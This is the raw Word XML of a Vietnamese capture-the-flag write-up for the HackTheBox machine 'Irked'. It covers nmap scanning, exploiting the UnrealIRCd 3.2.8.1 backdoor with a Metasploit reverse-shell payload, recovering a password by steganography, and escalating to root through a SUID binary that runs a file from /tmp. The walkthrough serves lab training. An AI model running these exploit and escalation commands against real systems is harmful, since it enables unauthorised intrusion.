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3D234" w14:textId="0182BCE2" w:rsidR="00FF1044" w:rsidRPr="00FF1044" w:rsidRDefault="00FF1044">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330B3D7" w14:textId="74E07647" w:rsidR="002F49FE" w:rsidRDefault="00FF1044">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1044">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B6FBDEB" wp14:editId="123004D1">
            <wp:extent cx="5157816" cy="312334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926" cy="314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7794" w14:textId="15954515" w:rsidR="006B76FF" w:rsidRDefault="006B76FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B76FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thấy lộ email của admin: djmardov@irked.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323CD6A1" w14:textId="6302AB23" w:rsidR="006B76FF" w:rsidRDefault="006B76FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786C56F2" w14:textId="7361F0F6" w:rsidR="006B76FF" w:rsidRPr="006B76FF" w:rsidRDefault="006B76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Liệt kê lỗ hổng dịch vụ bằng nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D3C236" w14:textId="1A87F366" w:rsidR="006556BF" w:rsidRDefault="006B76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D0C73B" wp14:editId="7E6DDC4D">
            <wp:extent cx="5210617" cy="3719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35" cy="37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4F71" w14:textId="1DA19585" w:rsidR="006B76FF" w:rsidRDefault="006B76FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35339FB5" w14:textId="77777777" w:rsidR="006B76FF" w:rsidRDefault="006B76FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF1BF58" w14:textId="1882B241" w:rsidR="006B76FF" w:rsidRDefault="006B76F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Quét chi tiết dịch vụ IRC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD36BC" w14:textId="34D5878A" w:rsidR="006B76FF" w:rsidRDefault="006B76F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9B5DC7" wp14:editId="03D8F256">
            <wp:extent cx="5943600" cy="3247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78BE" w14:textId="02F507D7" w:rsidR="006B76FF" w:rsidRDefault="006B76FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3A6846" w14:textId="1B642922" w:rsidR="006B76FF" w:rsidRDefault="0047468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Phiên bản của IRC là Unreal3.2.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548AA787" w14:textId="77777777" w:rsidR="006B76FF" w:rsidRPr="006B76FF" w:rsidRDefault="006B76FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554DAC55" w14:textId="6DB83E66" w:rsidR="00F3245F" w:rsidRDefault="0047468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kiếm các khai thác có sẵn trong Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00F3245F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F3245F" w:rsidRPr="00F3245F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unreal3.2.8.1</w:t>
      </w:r>
      <w:r w:rsidR="00F3245F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bị dính lỗ hổng backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67819990" w14:textId="503EAF90" w:rsidR="00F3245F" w:rsidRDefault="00AC0C63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004560" wp14:editId="04F608B2">
            <wp:extent cx="5943600" cy="2461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FF5B" w14:textId="6C0E09F1" w:rsidR="00AC0C63" w:rsidRDefault="00AC0C63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A0521E" w14:textId="14C0417F" w:rsidR="00AC0C63" w:rsidRPr="00831B1F" w:rsidRDefault="001325B0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D589D" w14:textId="1617ABC2" w:rsidR="001325B0" w:rsidRPr="00831B1F" w:rsidRDefault="008B68D1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set rhosts 10.10.10.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158ECC96" w14:textId="29B32A4E" w:rsidR="00A12B1E" w:rsidRPr="00831B1F" w:rsidRDefault="008B68D1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set rport 6697</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541C21A" w14:textId="1D674E47" w:rsidR="008B68D1" w:rsidRPr="00831B1F" w:rsidRDefault="008B68D1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set chost 10.10.16.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F32C147" w14:textId="596AAFC7" w:rsidR="00A12B1E" w:rsidRPr="00831B1F" w:rsidRDefault="00A12B1E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>set lhost 10.10.16.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE63D08" w14:textId="5C678C53" w:rsidR="00A12B1E" w:rsidRPr="00831B1F" w:rsidRDefault="00A12B1E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F2B04" w14:textId="03D6A349" w:rsidR="00A12B1E" w:rsidRDefault="00A12B1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00831B1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD39958" w14:textId="77777777" w:rsidR="00831B1F" w:rsidRDefault="00831B1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B95E181" w14:textId="1FE1C903" w:rsidR="008B68D1" w:rsidRDefault="00831B1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EC9F506" wp14:editId="6D603BC4">
            <wp:extent cx="5943600" cy="312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46D7" w14:textId="174F7C47" w:rsidR="00831B1F" w:rsidRDefault="00831B1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0F3B7F" w14:textId="5257C19A" w:rsidR="008B68D1" w:rsidRDefault="008331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không có đặc quyền để đọc tệp user.txt của người dùng djmardov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2136E481" w14:textId="0BAB20F7" w:rsidR="0047468C" w:rsidRDefault="0000374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B1891A" wp14:editId="21804EB2">
            <wp:extent cx="4889500" cy="82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6C69" w14:textId="4077D954" w:rsidR="0000374B" w:rsidRDefault="0000374B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D9358B" w14:textId="58AED8DB" w:rsidR="0000374B" w:rsidRDefault="009963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Truy cập thư mục của người dùng /home/djmardov/Documents/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C22499" w14:textId="02A71EA9" w:rsidR="009963A1" w:rsidRDefault="006E37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5B58F2" wp14:editId="7BF50AAA">
            <wp:extent cx="5943600" cy="894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F975" w14:textId="7721E2F5" w:rsidR="006E37E1" w:rsidRDefault="006E37E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0CBF99" w14:textId="4BFBEBED" w:rsidR="006E37E1" w:rsidRDefault="006E37E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được file .backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED419FF" w14:textId="62EF0080" w:rsidR="006E37E1" w:rsidRDefault="00407BD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877BCD" wp14:editId="524B0EBF">
            <wp:extent cx="2768600" cy="64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2A6F" w14:textId="5CAFA86F" w:rsidR="008E44BE" w:rsidRDefault="008E44BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DD886F" w14:textId="3EF344DC" w:rsidR="008E44BE" w:rsidRDefault="008E44B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Nó gợi ý cho mình là</w:t>
      </w:r>
      <w:r w:rsidR="001E2B14">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mật khẩu của</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stega</w:t>
      </w:r>
      <w:r w:rsidR="001E2B14">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nography. Tìm kiếm hình ảnh trong máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA4F01C" w14:textId="7E9C3198" w:rsidR="00407BDA" w:rsidRDefault="00407BDA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492782BD" w14:textId="7075B673" w:rsidR="00407BDA" w:rsidRDefault="00E1685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liệt kê hết thư mục của người dùng djmardov nhưng không biết mật khẩu dùng để làm gì.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260DAE3" w14:textId="77777777" w:rsidR="007F446D" w:rsidRDefault="007F446D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1B5349" w14:textId="3AAA5199" w:rsidR="006556BF" w:rsidRDefault="006117A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Giao diện trang web: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33091E9E" w14:textId="59B7C89C" w:rsidR="006117A1" w:rsidRDefault="006117A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9476DC" wp14:editId="4180F2BC">
            <wp:extent cx="3287283" cy="2907586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2" t="19360" r="35513" b="2345"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3288270" cy="290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7E102" w14:textId="2FA00FD9" w:rsidR="000F7D6F" w:rsidRDefault="000F7D6F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8CD711" w14:textId="47F7C280" w:rsidR="000F7D6F" w:rsidRDefault="000F7D6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Nó cho 1 cái hình</w:t>
      </w:r>
      <w:r w:rsidR="003564FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chứa mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ED9527" w14:textId="61BD50EE" w:rsidR="003D05E6" w:rsidRDefault="003D05E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D6ADED" w14:textId="15A57654" w:rsidR="00533AA0" w:rsidRDefault="00533AA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Dùng công cụ steghide để trích xuất dữ liệu trong hình ảnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B93628" w14:textId="675F5480" w:rsidR="001E2B14" w:rsidRDefault="001E2B14">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F39A6A3" w14:textId="77777777" w:rsidR="001E2B14" w:rsidRDefault="001E2B14">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3C7E72" w14:textId="77777777" w:rsidR="00533AA0" w:rsidRDefault="00533AA0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EF6909" w14:textId="77777777" w:rsidR="003D05E6" w:rsidRDefault="003D05E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F383B37" w14:textId="0A43822E" w:rsidR="007E69F6" w:rsidRDefault="001E2B1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70A81B6" wp14:editId="20F5A18E">
            <wp:extent cx="5410200" cy="232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DE06" w14:textId="3F8378AD" w:rsidR="001E2B14" w:rsidRDefault="001E2B14">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2ECC65" w14:textId="63E0E20E" w:rsidR="007E69F6" w:rsidRDefault="001E2B1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Trong hình ảnh có nhúng tệp pass.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52240DF4" w14:textId="454D1E4F" w:rsidR="006117A1" w:rsidRDefault="00890C0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88A596" wp14:editId="4985847B">
            <wp:extent cx="3644900" cy="104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93C4" w14:textId="5781A297" w:rsidR="00890C0C" w:rsidRDefault="00890C0C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23475346" w14:textId="77777777" w:rsidR="00890C0C" w:rsidRDefault="00890C0C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A47298E" w14:textId="1D335B1C" w:rsidR="006117A1" w:rsidRDefault="00387B5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C98887" wp14:editId="1DCB5973">
            <wp:extent cx="3454400" cy="81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FBD7" w14:textId="2FDC4990" w:rsidR="00387B5F" w:rsidRDefault="00387B5F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FEE6B7" w14:textId="7CBF6FC4" w:rsidR="00387B5F" w:rsidRDefault="002F0AF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2C4F174" wp14:editId="7F3A5AEF">
            <wp:extent cx="5943600" cy="2091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B69A" w14:textId="5C7D0A49" w:rsidR="002F0AFD" w:rsidRDefault="002F0AFD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44007247" w14:textId="18D78549" w:rsidR="002F0AFD" w:rsidRDefault="00067F2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BB5127B" wp14:editId="4BD08051">
            <wp:extent cx="3289300" cy="45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FD8A" w14:textId="4FAB5D91" w:rsidR="00067F29" w:rsidRDefault="00067F29">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C31539F" w14:textId="747F64DF" w:rsidR="00067F29" w:rsidRDefault="00F3433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Tìm các tập tin có đặc quyển suid:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564DBA0B" w14:textId="7EE71BB9" w:rsidR="00F34331" w:rsidRDefault="00F34331">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031F7F59" w14:textId="7396BC93" w:rsidR="00F34331" w:rsidRPr="00315099" w:rsidRDefault="003E7DA8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00315099">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>find / -type f -perm -04000 -ls 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CD4285" w14:textId="757DD08A" w:rsidR="00315099" w:rsidRDefault="00315099">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B63172" w14:textId="07155B0B" w:rsidR="00315099" w:rsidRDefault="003150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tìm được hai tệp thực thi khá thú vị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C892F" w14:textId="11E7595D" w:rsidR="003E7DA8" w:rsidRDefault="0031509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12FDD27" wp14:editId="2CC1625D">
            <wp:extent cx="5943600" cy="163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41F2" w14:textId="77777777" w:rsidR="00315099" w:rsidRDefault="00315099">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B95715" w14:textId="59526FD0" w:rsidR="003E7DA8" w:rsidRDefault="0031509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58871BF" wp14:editId="7B5128CA">
            <wp:extent cx="5943600" cy="180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6EF4" w14:textId="54E57229" w:rsidR="00315099" w:rsidRDefault="00315099">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015981D7" w14:textId="142BCFC5" w:rsidR="00315099" w:rsidRDefault="003150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Chạy thử xem sao</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE710F" w14:textId="07341D6F" w:rsidR="00315099" w:rsidRDefault="0031509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57E220" wp14:editId="235ECEE6">
            <wp:extent cx="5943600" cy="10521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D090" w14:textId="2417D6F4" w:rsidR="00315099" w:rsidRDefault="00315099">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419E1C91" w14:textId="1DBCDCC0" w:rsidR="00315099" w:rsidRDefault="0031509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Ứng dụng này có thể thiết lập đặc quyền cho người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D75EF" w14:textId="0F5236E8" w:rsidR="00315099" w:rsidRDefault="00315099">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7E916F" w14:textId="1DF9C518" w:rsidR="009B480E" w:rsidRDefault="009B480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Tập tin mà viewuser </w:t>
      </w:r>
      <w:r w:rsidR="00BD28F1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực thi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> không thành công: /tmp/listusers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335B3353" w14:textId="468C908F" w:rsidR="009B480E" w:rsidRDefault="009B480E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19929C23" w14:textId="2BD275B3" w:rsidR="00BD28F1" w:rsidRPr="00BD28F1" w:rsidRDefault="00BD28F1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD28F1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh: 1: /tmp/listusers: not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA28C5" w14:textId="77777777" w:rsidR="00BD28F1" w:rsidRDefault="00BD28F1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69354989" w14:textId="08D39069" w:rsidR="009B480E" w:rsidRDefault="003A5391" w:rsidP="003A53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Giống với khai thác PATH, tệp có suid là root sẽ t</w:t>
      </w:r>
      <w:r w:rsidR="00C217CF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hực thi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 tệp ở vị trí chúng ta có thể ghi /tmp</w:t>
      </w:r>
      <w:r w:rsidR="00C217CF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716AAB85" w14:textId="2442F1A6" w:rsidR="0017728B" w:rsidRDefault="0017728B" w:rsidP="003A5391">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373D292C" w14:textId="28CE0C10" w:rsidR="0017728B" w:rsidRDefault="0017728B" w:rsidP="003A53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Vậy khai thác giống PATH là được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF4E89C" w14:textId="185CD459" w:rsidR="00827F8E" w:rsidRDefault="0017728B" w:rsidP="003A539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485560B" wp14:editId="104DEBD4">
            <wp:extent cx="5232400" cy="228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13E1" w14:textId="77777777" w:rsidR="0017728B" w:rsidRDefault="0017728B" w:rsidP="003A5391">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBE1607" w14:textId="205FCE21" w:rsidR="00827F8E" w:rsidRDefault="00827F8E" w:rsidP="003A5391">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
